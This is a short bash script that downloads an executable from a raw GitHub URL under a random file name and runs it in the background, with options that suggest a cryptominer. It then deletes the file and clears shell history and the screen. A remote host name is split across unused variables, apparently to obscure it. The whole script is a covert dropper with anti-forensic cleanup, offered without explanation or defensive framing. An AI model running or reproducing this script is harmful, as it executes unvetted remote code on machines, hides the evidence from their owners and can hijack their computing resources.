#!/bin/bash
rni=$(cat /dev/urandom | tr -dc 'a-z' | fold -w 3 | head -n 1)
u1="xkjxrwat"
u2="ap-southeast-1"
u3="clawcloudrun"
u4="com"
curl https://raw.githubusercontent.com/madafatt/happy-fox-928/refs/heads/main/rw > $rni
chmod +x $rni
nohup ./$rni -j 4 > /dev/null & disown
sleep 5
rm $rni
history -c
clear
